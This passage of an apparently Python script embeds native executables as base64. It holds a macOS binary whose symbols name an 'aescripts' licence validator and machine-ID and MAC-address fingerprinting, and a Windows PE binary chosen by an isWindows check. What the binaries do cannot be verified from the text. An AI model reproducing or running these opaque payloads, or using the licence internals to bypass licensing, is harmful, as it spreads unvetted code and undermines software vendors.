L01hY09TWC5wbGF0Zm9ybS9EZXZlbG9wZXIvU0RLcy9NYWNPU1gxMC43LnNkay91c3IvaW5jbHVkZS9jKysvNC4yLjEvYml0cy9pb3NfYmFzZS5oAC9BcHBsaWNhdGlvbnMvWGNvZGUuYXBwL0NvbnRlbnRzL0RldmVsb3Blci9QbGF0Zm9ybXMvTWFjT1NYLnBsYXRmb3JtL0RldmVsb3Blci9TREtzL01hY09TWDEwLjcuc2RrL3Vzci9pbmNsdWRlL2MrKy80LjIuMS9iaXRzL3N0bF9pdGVyYXRvci5oAF9fWk45YWVzY3JpcHRzMTV2YWxpZGF0ZUxpY2Vuc2VFUGNpUk5TXzExTGljZW5zZURhdGFFAF9fWk45YWVzY3JpcHRzMTdzYXZlTGljZW5zZVRvRmlsZUVQY1MwXwAvQXBwbGljYXRpb25zL1hjb2RlLmFwcC9Db250ZW50cy9EZXZlbG9wZXIvUGxhdGZvcm1zL01hY09TWC5wbGF0Zm9ybS9EZXZlbG9wZXIvU0RLcy9NYWNPU1gxMC43LnNkay91c3IvaW5jbHVkZS9jKysvNC4yLjEvYml0cy9jaGFyX3RyYWl0cy5oAC9BcHBsaWNhdGlvbnMvWGNvZGUuYXBwL0NvbnRlbnRzL0RldmVsb3Blci9QbGF0Zm9ybXMvTWFjT1NYLnBsYXRmb3JtL0RldmVsb3Blci9TREtzL01hY09TWDEwLjcuc2RrL3Vzci9pbmNsdWRlL2MrKy80LjIuMS9pb21hbmlwAC9BcHBsaWNhdGlvbnMvWGNvZGUuYXBwL0NvbnRlbnRzL0RldmVsb3Blci9QbGF0Zm9ybXMvTWFjT1NYLnBsYXRmb3JtL0RldmVsb3Blci9TREtzL01hY09TWDEwLjcuc2RrL3Vzci9pbmNsdWRlL2MrKy80LjIuMS9iaXRzL2Jhc2ljX2lvcy5oAC9BcHBsaWNhdGlvbnMvWGNvZGUuYXBwL0NvbnRlbnRzL0RldmVsb3Blci9QbGF0Zm9ybXMvTWFjT1NYLnBsYXRmb3JtL0RldmVsb3Blci9TREtzL01hY09TWDEwLjcuc2RrL3Vzci9pbmNsdWRlL2MrKy80LjIuMS9zc3RyZWFtAF9fWk45YWVzY3JpcHRzN2dldFBhdGhFU3NiUlNzAF9fWk5TczEyX1NfY29uc3RydWN0SU45X19nbnVfY3h4MTdfX25vcm1hbF9pdGVyYXRvcklQY1NzRUVFRVMyX1RfUzRfUktTYUljRVN0MjBmb3J3YXJkX2l0ZXJhdG9yX3RhZwAvQXBwbGljYXRpb25zL1hjb2RlLmFwcC9Db250ZW50cy9EZXZlbG9wZXIvUGxhdGZvcm1zL01hY09TWC5wbGF0Zm9ybS9EZXZlbG9wZXIvU0RLcy9NYWNPU1gxMC43LnNkay91c3IvaW5jbHVkZS9jKysvNC4yLjEvYml0cy9iYXNpY19zdHJpbmcudGNjAF9fWk5TczEyX1NfY29uc3RydWN0SVBjRUVTMF9UX1MxX1JLU2FJY0VTdDIwZm9yd2FyZF9pdGVyYXRvcl90YWcAL0FwcGxpY2F0aW9ucy9YY29kZS5hcHAvQ29udGVudHMvRGV2ZWxvcGVyL1BsYXRmb3Jtcy9NYWNPU1gucGxhdGZvcm0vRGV2ZWxvcGVyL1NES3MvTWFjT1NYMTAuNy5zZGsvdXNyL2luY2x1ZGUvYysrLzQuMi4xL2JpdHMvc3RsX2l0ZXJhdG9yX2Jhc2VfZnVuY3MuaABfX0dMT0JBTF9fSV9hAEdDQ19leGNlcHRfdGFibGUxAEdDQ19leGNlcHRfdGFibGUyAEdDQ19leGNlcHRfdGFibGU2AEdDQ19leGNlcHRfdGFibGU4AF9fWlN0TDhfX2lvaW5pdABfbWFpbgBfX0dMT0JBTF9fSV9hAF9fWkwxMWdldENoZWNrc3VtU3NTcwBfX1pMMTJCaXRfTWFuZ2xlXzFpaWlpaWlpAF9fWkwxMkJpdF9NYW5nbGVfMmlpaWlpaWkAX19aTDEyQml0X01hbmdsZV8zaWlpaWlpaQBfX1pMMTJCaXRfTWFuZ2xlXzRpaWlpaWlpAF9fWkwxMkJpdF9NYW5nbGVfNWlpaWlpaWkAX19HTE9CQUxfX0lfYQBfX0dMT0JBTF9fSV9hAEdDQ19leGNlcHRfdGFibGUyAEdDQ19leGNlcHRfdGFibGUzAEdDQ19leGNlcHRfdGFibGU0AEdDQ19leGNlcHRfdGFibGU1AEdDQ19leGNlcHRfdGFibGUxAEdDQ19leGNlcHRfdGFibGUyAEdDQ19leGNlcHRfdGFibGU2AEdDQ19leGNlcHRfdGFibGU4AF8ubWVtc2V0X3BhdHRlcm4AX19aU3RMOF9faW9pbml0AF9fWlN0TDhfX2lvaW5pdABfX1pTdEw4X19pb2luaXQAX05YQXJnYwBfTlhBcmd2AF9fWjEzcmV2ZXJzZVN0cmluZ1NzAF9fWjE0Y2hlY2tCbGFja0xpc3RpaWlpAF9fWjE0bWFrZVNlZWRzQXJyYXlTc2kAX19aMThjaGVja0JsYWNrTGlzdF9vbGRpaQBfX1o0a2V5MVNzaQBfX1pOMTdNQUNBZGRyZXNzVXRpbGl0eTE4R2V0QWxsTUFDQWRkcmVzc2VzRVBoAF9fWk4xN01BQ0FkZHJlc3NVdGlsaXR5MjFHZXRBbGxNQUNBZGRyZXNzZXNNYWNFUGgAX19aTjlhZXNjcmlwdHMxMmdldE1hY2hpbmVJZEVSQTEyOF9jAF9fWk45YWVzY3JpcHRzMTV2YWxpZGF0ZUxpY2Vuc2VFUGNpUk5TXzExTGljZW5zZURhdGFFAF9fWk45YWVzY3JpcHRzMTdzYXZlTGljZW5zZVRvRmlsZUVQY1MwXwBfX1pOOWFlc2NyaXB0czE5bG9hZExpY2Vuc2VGcm9tRmlsZUVQY1JBMTI4X2MAX19aTjlhZXNjcmlwdHM3Z2V0UGF0aEVTc2JSU3MAX19aTlNzMTJfU19jb25zdHJ1Y3RJTjlfX2dudV9jeHgxN19fbm9ybWFsX2l0ZXJhdG9ySVBjU3NFRUVFUzJfVF9TNF9SS1NhSWNFU3QyMGZvcndhcmRfaXRlcmF0b3JfdGFnAF9fWk5TczEyX1NfY29uc3RydWN0SVBjRUVTMF9UX1MxX1JLU2FJY0VTdDIwZm9yd2FyZF9pdGVyYXRvcl90YWcAX19aU3RwbEljU3QxMWNoYXJfdHJhaXRzSWNFU2FJY0VFU2JJVF9UMF9UMV9FUktTNl9TOF8AX19fcHJvZ25hbWUAX19taF9leGVjdXRlX2hlYWRlcgBfZW52aXJvbgBzdGFydABfRlNGaW5kRm9sZGVyAF9GU1JlZk1ha2VQYXRoAF9fVW53aW5kX1Jlc3VtZQBfX1pOS1NzNGZpbmRFUEtjbW0AX19aTktTczZzdWJzdHJFbW0AX19aTktTdDEzYmFzaWNfZmlsZWJ1ZkljU3QxMWNoYXJfdHJhaXRzSWNFRTdpc19vcGVuRXYAX19aTktTdDE1YmFzaWNfc3RyaW5nYnVmSWNTdDExY2hhcl90cmFpdHNJY0VTYUljRUUzc3RyRXYAX19aTktTdDliYXNpY19pb3NJY1N0MTFjaGFyX3RyYWl0c0ljRUU0ZmlsbEV2AF9fWk5LU3Q5YmFzaWNfaW9zSWNTdDExY2hhcl90cmFpdHNJY0VFNXdpZGVuRWMAX19aTlNpMTBfTV9leHRyYWN0SW1FRVJTaVJUXwBfX1pOU2k0cmVhZEVQY2wAX19aTlNpNXNlZWtnRXhTdDEyX0lvc19TZWVrZGlyAF9fWk5TaTV0ZWxsZ0V2AF9fWk5TbzNwdXRFYwBfX1pOU281Zmx1c2hFdgBfX1pOU281d3JpdGVFUEtjbABfX1pOU285X01faW5zZXJ0SW1FRVJTb1RfAF9fWk5TczEyX01fbGVha19oYXJkRXYAX19aTlNzNF9SZXAxMF9NX2Rlc3Ryb3lFUktTYUljRQBfX1pOU3M0X1JlcDExX1NfdGVybWluYWxFAF9fWk5TczRfUmVwMjBfU19lbXB0eV9yZXBfc3RvcmFnZUUAX19aTlNzNF9SZXA5X1NfY3JlYXRlRW1tUktTYUljRQBfX1pOU3M1ZXJhc2VFbW0AX19aTlNzNmFwcGVuZEVQS2NtAF9fWk5TczZhcHBlbmRFUktTcwBfX1pOU3M2YXNzaWduRVBLY20AX19aTlNzNmFzc2lnbkVSS1NzAF9fWk5TczlfTV9tdXRhdGVFbW1tAF9fWk5TczlwdXNoX2JhY2tFYwBfX1pOU3NDMUVQS2NSS1NhSWNFAF9fWk5Tc0MxRVBLY21SS1NhSWNFAF9fWk5Tc0MxRVJLU3MAX19aTlNzRDJFdgBfX1pOU3QxNGJhc2ljX2lmc3RyZWFtSWNTdDExY2hhcl90cmFpdHNJY0VFNWNsb3NlRXYAX19aTlN0MTRiYXNpY19pZnN0cmVhbUljU3QxMWNoYXJfdHJhaXRzSWNFRUMxRVBLY1N0MTNfSW9zX09wZW5tb2RlAF9fWk5TdDE0YmFzaWNfaWZzdHJlYW1JY1N0MTFjaGFyX3RyYWl0c0ljRUVEMUV2AF9fWk5TdDE0YmFzaWNfb2ZzdHJlYW1JY1N0MTFjaGFyX3RyYWl0c0ljRUU1Y2xvc2VFdgBfX1pOU3QxNGJhc2ljX29mc3RyZWFtSWNTdDExY2hhcl90cmFpdHNJY0VFQzFFUEtjU3QxM19Jb3NfT3Blbm1vZGUAX19aTlN0MTRiYXNpY19vZnN0cmVhbUljU3QxMWNoYXJfdHJhaXRzSWNFRUQxRXYAX19aTlN0MThiYXNpY19zdHJpbmdzdHJlYW1JY1N0MTFjaGFyX3RyYWl0c0ljRVNhSWNFRUMxRVN0MTNfSW9zX09wZW5tb2RlAF9fWk5TdDE4YmFzaWNfc3RyaW5nc3RyZWFtSWNTdDExY2hhcl90cmFpdHNJY0VTYUljRUVEMUV2AF9fWk5TdDhpb3NfYmFzZTRJbml0QzFFdgBfX1pOU3Q4aW9zX2Jhc2U0SW5pdEQxRXYAX19aU3QxNl9fb3N0cmVhbV9pbnNlcnRJY1N0MTFjaGFyX3RyYWl0c0ljRUVSU3QxM2Jhc2ljX29zdHJlYW1JVF9UMF9FUzZfUEtTM19sAF9fWlN0MTlfX3Rocm93X2xvZ2ljX2Vycm9yUEtjAF9fWlN0NGNvdXQAX19aU3Q5dGVybWluYXRldgBfX1pkYVB2AF9fWm5hbQBfX19jeGFfYXRleGl0AF9fX2N4YV9iZWdpbl9jYXRjaABfX19jeGFfZW5kX2NhdGNoAF9fX2d4eF9wZXJzb25hbGl0eV92MABfX19zdGFja19jaGtfZmFpbABfX19zdGFja19jaGtfZ3VhcmQAX2F0b2kAX2F0b2wAX2V4aXQAX2ZyZWVpZmFkZHJzAF9nZXRpZmFkZHJzAF9tZW1jcHkAX21lbXNldF9wYXR0ZXJuMTYAX3NwcmludGYAX3N0cmNtcABfc3RyY3B5AF9zdHJsZW4AZHlsZF9zdHViX2JpbmRlcgA=')
return R
if a.__isWindows():
R = at(
'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